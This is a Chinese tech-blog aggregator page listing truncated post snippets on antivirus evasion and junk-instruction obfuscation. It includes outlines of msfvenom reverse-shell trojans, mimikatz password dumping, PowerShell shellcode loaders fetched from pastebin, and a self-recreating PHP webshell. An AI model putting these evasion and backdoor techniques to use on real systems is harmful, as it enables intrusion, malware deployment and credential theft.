E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
免杀_花指令
花指令
完全
花指令
免杀
学习
花指令
,简称“花”,意思是像花儿一样的指令。花儿是干什么的呢?当然是吸引你去观赏的,就是让你(也包括杀软)只顾去观赏美丽“花朵”,而忘记或者忽略了“花朵”后面的“果实”。
weixin_33939843
·
2020-08-16 15:49
浅谈利用cs进行
免杀
的思路总结
思路①利用c语言+veil实现
免杀
#include"pch.h"//可以删除#include#include#pragmacomment(linker,"/subsystem:\"windows\"/entry
goddemondemongod
·
2020-08-16 14:31
安全
python
后渗透攻防的信息收集 -- MottoIN
常用来获取windows密码的工具1.mimikatz2.wce3.getpass4.QuarksPwDump5.reg-sam6.pwdump77.procdump.exe+mimikatz…….B.
免杀
抓取密码的两种方
qq_27446553
·
2020-08-16 14:33
Windows渗透
第五章
花指令
与
免杀
读书笔记
1为了保护真正的果实,所以使用花朵是别人迷惑.
花指令
不是加密代码,它分两种:a夹杂运行b高级语言的
花指令
应用,程序在运行时会因为
花指令
而改变原有的流程.该书暂不涉及,据称"比较复杂且效果有限"2脚本木马
花指令
dalerkd
·
2020-08-16 12:13
苦行僧之路
读书笔记
Web渗透之MSF框架——msfvenom与
免杀
木马制作
文章目录生成常见的反向连接木马反向连接的优势:Windows:Linux:MAC:PHP:Asp:Aspx:msfvenom参数介绍生成
免杀
木马360
免杀
木马腾讯管家
免杀
木马
免杀
木马测试写在最后生成常见的反向连接木马连接一般分为正向连接和反向连接
Mr. Wanderer
·
2020-08-16 11:17
木马
免杀
之汇编
花指令
技巧
木马
免杀
之汇编
花指令
技巧作者:逆流风(发表于《黑客X档案》07.07,转载注明出处)相信很多朋友都做过木马
免杀
,早期的
免杀
都是加壳和改特征码,现在
免杀
技术已经发展到
花指令
免杀
,改壳之类的,而这些需要一定的汇编知识
weixin_30730151
·
2020-08-16 11:16
Android 混淆
Android混淆:混淆的意义如何开启混淆混淆的规则常用的混淆模板拆分混淆文件一.混淆的意义代码混淆(Obfuscatedcode)亦称
花指令
,是将计算机程序的代码,转换成一种功能上等价,但是难于阅读和理解的形式的行为
name不是null
·
2020-08-15 13:55
Android
[远控
免杀
]msf生成木马的信息储备
1.msfvenom的命令使用Options:-p,--payload指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l,--list[module_type]列出指定模块的所有可用资源.模块类型包括:payloads,encoders,nops,all-n,--nopsled为payload预先指定一个NOP滑动长
千^里
·
2020-08-15 07:53
剑在手
天下走
java代码混淆-ProGuard
java代码可以反编译,因此有时候要保护自己的知识产权还真得费点心思,一般来说有三个思路:1、将class文件加密,这个是最安全的,但也费事儿,因为要重写classloader来解密class文件;2、使用
花指令
江湖之笑
·
2020-08-14 15:03
远控软件GHOST源码
免杀
远控软件gh0st源码
免杀
远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马
免杀
工作。
HEJSCLK
·
2020-08-13 14:11
黑客技术
cobalt strike木马
免杀
0x001-针对powershell
免杀
工具:Invoke-Obfuscation操作实例:1、利用CS生成powershell木马2、进入invoke-Obsfuscation文件,使用powershell
shinyruo开始了
·
2020-08-12 16:29
免杀
技术有一套(
免杀
方法大集结)(Anti-AntiVirus)
00.概述什么是
免杀
?
anhkgg
·
2020-08-11 21:02
原创
Windows
汇编"
免杀
"基础知识
一.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码就是机器码.修改程序时必须通过修改机器码来修改exe文件.二.需要熟练掌握的全部汇编知识(只有这么多)不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了cmpa,b比较a与bmova,b把b的值送给aret返回主程序nop无作
艾伦之家
·
2020-08-11 11:54
安全
黑客
渗透测试之权限维持
Web后门1:隐藏后门文件(将文件设置为隐藏)2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话
免杀
木马。结合attrib命令隐藏文件更好地建立后门。"
QingChenHT
·
2020-08-11 10:35
渗透测试-权限维持
代码混淆
5.代码混淆(Obfuscatedcode)亦称
花指令
,是将计算机程序的代码
平凡的路
·
2020-08-11 03:57
安卓
入侵局域网的全攻略
入侵工具:一般要用到三个:NTscan变态扫描器,Recton--D贺
免杀
专用版,DameWare迷你中文版4.5.
清水迎朝阳
·
2020-08-10 21:45
黑客技术
远控
免杀
专题 14 ---AVIator
0x01
免杀
能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
go0dStudy
·
2020-08-10 20:40
免杀专题
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
JS脚本木马之所以会如此泛滥,与它的编写简单、易于
免杀
以及难以封堵等特点息息相关。而我们本次的课程也会围绕它的这三个
ioio_jy
·
2020-08-10 09:07
病毒木马查杀实战
Android混淆
代码混淆(Obfuscatedcode)亦称
花指令
,是将计算机程序的代码,转换成一种功能上等价,但是难于阅读和理解的形式的行为。
AAAA_Roshen
·
2020-08-09 06:58
快速开发收藏
花指令
,LLVM简介
花指令
就是无用或者垃圾指令,故意干扰反汇编静态分析工具,比如jmpLabel1dbopcodeLabel1;运行会跳到Label1,但是静态分析工具看到opcode会把后面当作机器码的操作数。
kernweak
·
2020-08-09 03:05
反汇编
计算机知识
逆向
木马
免杀
基础学习
参考书籍:《木马攻防全攻略》--万立夫编著--电脑报电子音像出版社参考链接:https://www.52pojie.cn/thread-32064-1-1.html推荐的
免杀
思路链接:http://www.cnhonkerarmy.com
fa1lr4in
·
2020-08-07 23:42
免杀
基于PowerShll的
免杀
思路,过国外主流杀毒
1)首先准备一个你的RAT小马,可以是任何exe后缀的文件2)使用工具将exe转换为Base64格式3)将Base64字符串上传到pastebin.com,或者github,得到一个可访问的raw的地址4)将得到的raw地址,替换下面ps代码中的URL,并将该文件保存为Injecttopowershell.vbsCreateObject("WScript.Shell").Run"PowerShel
FFE4
·
2020-08-07 23:27
心情杂货铺
利用Office公式编辑器特殊处理逻辑的
免杀
技术分析(CVE-2017-11882)
利用Office公式编辑器特殊处理逻辑的
免杀
技术分析(CVE-2017-11882)阅读量44989|评论3分享到:发布时间:2018-09-1110:00:14背景2018年8月24日,360威胁情报中心捕获到一个专门为乌克兰语使用者设计的钓鱼文档
betteroneisme
·
2020-08-07 23:12
【
免杀
篇】远控
免杀
专题(22)-SpookFlare
免杀
(VT
免杀
率16/67)
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01SpookFlare介绍0x02安装SpookFlare0x03SpookFlare使用说明0x04利用SpookFlare生成后门0x05SpookFlare小结
免杀
能力一览表
Agan '
·
2020-08-07 23:17
免杀篇
【
免杀
篇】远控
免杀
专题(53)-白名单WMIC.exe执行payload
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01WMIC介绍0x02WMIC使用0x03使用WMIC远程加载payload利用metasploit自定义
免杀
0x01WMIC介绍WMIC扩展
Agan '
·
2020-08-07 23:17
免杀篇
Android代码混淆
代码混淆(Obfuscatedcode)亦称
花指令
,是将计算机程序的代码,转换成一种功能上等价,但是难于阅读和理解的形式的行为。
马占柱
·
2020-08-07 13:06
技术总结
开发新技术
APP更新相关
代码加密
混淆
sutdio混淆
安卓混淆
安卓加密
java webshell jsp 木马攻防 简介
目录基础知识JSP标签JSP中的字符串混淆方式类反射类加载对命令执行JSP一句话
免杀
原型类反射绕过寻找其他类对于冰蝎JSP一句话的
免杀
免杀
D盾
免杀
百度scanner总结防范方法其他类型的webshell
whatday
·
2020-08-06 13:32
2020 "第五空间"智能安全大赛 Re nop
测试文件:https://wwa.lanzous.com/is4hte2ulfc代码处理这道题是
花指令
相关题目,利用int80h做中断。
Hk_Mayfly
·
2020-08-05 19:22
捆绑后门的艺术--CobaltStrike backdoor分析
其中,捆绑型后门是攻击者较为喜欢的一种后门,因为其具有较好的隐蔽性及
免杀
效果。下面,就来剖析一下该类后门的捆绑及
免杀
原理。
systemino
·
2020-08-05 11:56
看雪CTF 2017 第六题设计思路和解题思路
2.so层用
花指令
对程序指令进行混淆,在一定程度上防止分析。解题:编写去
花指令
脚本,F5就会变得很简单。去花后check函数如下:这样就能很清楚看到注册过程了,第一个while
Ericky_
·
2020-08-05 10:08
Android
使用MSF生成的shellcode打造
免杀
payload
环境:1.Kali攻击机IP:192.168.114.1402.使用win7生成exe步骤:使用msfvenom生成shellcode:msfvenom-pwindows/meterpreter/reverse_httplhost=192.168.114.140lport=5555-fcwin7中使用Visualstudio创建Win32控制台项目(如果装了gcc,也可以使用gcc编译):选择空项
zkwniky
·
2020-08-04 22:04
渗透测试
第十六章
免杀
.防病毒软件▪恶意程序最主要的防护手段–杀毒软件/防病毒软件–客户端/服务端/邮件防病毒▪检测原理–基于二进制文件中特征签名的黑名单检测方法–基于行为的分析方法(启发式)▪事后手段–永远落后于病毒发展
免杀
技术
baihuang8062
·
2020-08-04 13:27
nps内网渗透利用
0x00前言对比了比较多的代理工具,如ew流量不稳定,容易断;frsocks目前
免杀
,也是容易断。frp需要落地配置文件,不符合渗透的规则。reg正向的socks,速度比较慢,扫描是个问题。
weixin_30883311
·
2020-08-02 19:14
【
免杀
篇】远控
免杀
专题(31)-powershell加载shellcode
免杀
-4种方式(VT
免杀
率5-58)
加载shellcode介绍0x02powershell的几个基础知识powershell版本问题常见执行方式执行策略0x03powershell加载shellcode方法1:msf-ps1本地执行(VT
免杀
率
Agan '
·
2020-08-02 15:07
免杀篇
Powershell Empire 绕过AV实现远控
虽然这款框架集成了从漏洞发现到漏洞利用的几乎所有功能,但是不得不承认其在木马后门的
免杀
方面现如今已经不足以应付一些流氓杀软了。但是,PowershellEmpire可以。
weixin_34037977
·
2020-08-02 14:33
操作系统
python
shell
empire用法笔记
其中集成了很多内网的一些工具以及命令,使用方便,且empire生成的木马文件基于powershell,所以在windows平台上有很好的
免杀
效果。结合msf使用更是如虎添翼。
aFa攻防实验室
·
2020-08-02 13:45
渗透测试
Kali
msf
[源码和文档分享]基于VC++的WIN32 API界面编程实现的百战天虫小游戏
HERO阵营的目标为阻止精灵继续逍遥法外,但是为了保护珍稀精灵,HERO需要尽量避
免杀
死精灵,并且收服精灵。WIZARD阵营的目标为杀死HERO阵
ggdd5151
·
2020-08-01 07:26
通过xencrypt
免杀
invoke-mimikatz.ps1
0x01简介xencrypt目前测试只在windows2012powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。0x02使用1、下载invoke-mimikatz.ps1到同级目录下。https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltratio
`GGyao
·
2020-07-30 15:15
免杀
如何在目标内网中发现更多存活主机
win下进行各种arp扫描:1#start/barpscan.exe-t192.168.3.0/24>>result.txt利用powershell脚本进行arp扫描,这也是个人比较推荐的方式,轻量且
免杀
效果较
weixin_30305735
·
2020-07-30 12:46
柳宗元的高级隐喻故事:《种树郭囊驼传》顺从人的天性,自然发展
左传战国策,很多士大夫再劝谏国君的时候都是大量的都是大量的引用寓言故事,以避
免杀
身之祸,取得了非常好的劝谏的效果。
正念教练张林宝
·
2020-07-30 11:20
病毒知识与常见杀毒软件了解
病毒常用的
免杀
技术加壳加花变种升级杀毒引擎杀毒引擎的任务:对指定的文件或程序进行判断是否合法。脱壳分为硬脱壳和动态脱壳虚拟机脱壳引擎技
weixin_30929195
·
2020-07-30 02:24
区块链
CrypMic分析报告
通过函数返回地址+函数第一个参数来确定跳转到的地址,这里主要用于
免杀
和增加逆向分析难度。释放恶意代码。多次跳转后到达PE解密的地方,首先从第一个区段中获取到用于PE替换的数据
weixin_30527143
·
2020-07-30 02:39
GuLoader分析报告
GuLoader分析报告文章目录GuLoader分析报告基本信息样本基本信息主要执行流程关键技术概览反虚拟机1.内存遍历检测字符串2.qemu-ga.exe3.窗口数量检测反逆向分析1.
花指令
2.反调试
playmak3r
·
2020-07-29 23:00
样本分析
CTF安卓逆向练习第五弹
CTF安卓逆向练习第五弹写在前面的话:这次练习的是看雪2017CTF的第六题,涉及的知识点比较多,包括
花指令
,加密,编码等,自己并没有做出来,看了许多大佬的wp,自己跟着跑了一遍,期间遇到了许多问题,现在整理一下
熊铁柱
·
2020-07-29 12:55
CTF
「娃娃分享」-反调试技术总结.
1.
花指令
在原程序中添加一些汇编指令,添加后不影响原程序的正常功能
weixin_30371875
·
2020-07-29 11:03
TideSec远控
免杀
学习四(BackDoor-Factory+Avet+TheFatRat)
参考资料利用BDF向EXE文件植入后门:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/backdoor-factory使用简介:https://www.lstazl.com/
fa1lr4in
·
2020-07-29 09:12
免杀
教你制作一个木马
免杀
的360
制作一个360
免杀
的木马我们用到工具:kail:利用msfvenom(美少妇)MSFvenom的常用命令1、我们进入到msf里面在msf后生成一个exe的木马文件,这-p就是生成window模块playload
EdisonJH
·
2020-07-29 09:39
kail
黑客工具使用
PHP一句话木马
免杀
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马
免杀
小技巧
免杀
小技巧1.字符串拼接方式,构造敏感函数。
小刚127.0.0.1
·
2020-07-29 08:52
Web安全笔记
代码审计
一句话木马
免杀
从webshell开始的内网入侵
对内网入侵的一个小总结,大多是参考一叶知安的文章:一次完整的从webshell到域控的探索之路正文开始:大体思路:
免杀
payload的生成,请使用Veilmsf在meterpreter下的提权尝试msf
逝之君
·
2020-07-29 02:57
渗透测试
20169205 2016-2017-2 《网络攻防技术》
免杀
技术
201692052016-2017-2《网络攻防技术》
免杀
技术一、基础问题回答(1)杀软是如何检测出恶意代码的?
weixin_30849591
·
2020-07-28 17:19
上一页
9
10
11
12
13
14
15
16
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他